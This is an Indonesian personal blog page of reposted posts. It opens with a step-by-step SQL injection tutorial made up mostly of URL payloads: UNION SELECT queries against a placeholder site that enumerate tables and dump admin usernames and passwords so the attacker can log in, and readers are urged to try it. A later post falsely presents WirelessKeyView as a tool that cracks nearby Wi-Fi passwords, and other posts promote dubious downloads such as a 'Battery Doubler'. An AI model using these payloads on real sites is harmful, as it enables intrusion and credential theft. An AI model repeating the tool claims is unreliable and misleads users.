-meLLia maRseLina's bLog-

Senin, 14 Maret 2011

Hacking Website dengan tekhnik SQL Injection

hacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.

ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N

oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...
---------------------------------------------------

begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC


oke selamat mencoba.
terpenting jangan dilakukan di web teman anda ataupun di website Lokal.

source: http://pedasmaniscinta.blogspot.com/2009/07/hacking-website-dengan-tekhnik-sql.html
posted by meLLia maRseLina at 22.14 0 comments

Hack Password Wifi

Mau ngenet tapi dana terbatas ? Mau internetan gratis tapi kesulitan mencari tahu password wifi ? Mungkin tutorial kali ini bisa memudahkan anda mendapatkan koneksi via wifi yang tersedia di kota anda. Hack Password Wifi ini berasal dari sebuah tool sederhana yang akan membantu anda mencari jaringan wifi terdekat sekaligus memberitahu apa password yang digunakan. Dengan cara ini anda tidak perlu lagi bingung berpindah2 tempat hanya untuk mencari internet gratis. Namun untuk bisa menikmati fasilitas ini, anda diwajibkan untuk melakukan download guna mendapatkan tool hack password wifi yang dimaksud. Dan berikut adalah tutorialnya

Yang perlu anda ketahui bahwa hack password wifi versi ini menggunakan software WirelessKeyView. Namun anda tidak perlu bingung karena penggunaan software ini sangat mudah dan tidak perlu diinstalce: terlebih dahulu. Jika anda sudah mengunduh tool tersebut, silahkan buka WirelessKeyView dan ia akan langsung mencari jaringan wifi secara otomatis yang terproteksi password maupun yang free. Jika sudah siap, silahkan untuk mengcopy langsung password ke wifi yang terproteksi oleh password. Copy kalimat atau angka atau huruf atau simbol lain yang ada di bagian Key (Ascii). Untuk mencoba silahkan download tool dibawah ini

Download WirelessKeyView untuk Windows Xp x32 atau Windows Vista x32 disini
Download WirelessKeyView untuk Windows Xp x64 atau Windows Vista x64 disini

source : http://achiles-punyablog.blogspot.com/2010/12/hack-password-wifi.html
posted by meLLia maRseLina at 22.07 0 comments

Kamis, 13 Januari 2011

cara terbaik melindungi komputer dari serangan hacker

Software ZoneAlarm

Lindungi komputer Anda dari serangan hacker ketika Anda sedang online. Program ini dilengkapi fitur-fitur firewall, application control, internet lock dan sebagainya
firewall, Management Tools, Microsoft Windows, Personal Firewalls, Products, Security, zonealarm

Software ZoneAlarm

Download
Software Untuk Melindungi komputer Anda dari serangan hacker ketika Anda sedang online

DOWNLOAD HERE
posted by meLLia maRseLina at 17.22 0 comments

cara menggandakan kemampuan baterai laptop : Laptop Battery Doubler v1.2


Keterangan:
Battery Doubler bisa melipatgandakan otonomi baterai laptop kamu dengan sedikit atau tidak ada konsesi. Install Battery Doubler, cabut listrik AC and experience total laptop freedom!!

Download HERE
posted by meLLia maRseLina at 17.17 0 comments

free great sms software - INDONESIAN software


gili-promo-perdana.jpg
Gili-SMS merupakan software SMS yang dikembangkan dari Gili (freeware).
Gili-SMS dapat dipergunakan sebagai sarana untuk :

Saat ini banyak operator saling memberikan SMS murah bahkan gratis, mulai dari ratusan sampai puluhan ribu SMS setiap hari. Anda dapat memanfaatkan momen ini untuk menunjang usaha dengan memberikan informasi, promosi atau layanan melalui SMS kepada relasi dan pelanggan. Hal ini dapat meningkatkan marketing, memberikan rasa kepercayaan dan nilai lebih. Gili-SMS membantu dalam memproses dan mengelola SMS sehingga menghemat waktu anda dalam bekerja.
Release Gili-SMS diperkirakan pada akhir bulan Desember 2010.

UNTUK MENDOWNLOAD GRATIS 
SILAHKAN KLIK LINK DOWNLO\AD DI BAWAH INI


DOWNLOAD HERE GILI SMS - FREE





FITUR :
Proteksi program dengan password agar tidak bisa digunakan oleh user lain yang menggunakan komputer

Pencarian SMS

source : http://pc-alert.blogspot.com/2011/01/free-great-sms-software-indonesian.html
posted by meLLia maRseLina at 17.15 0 comments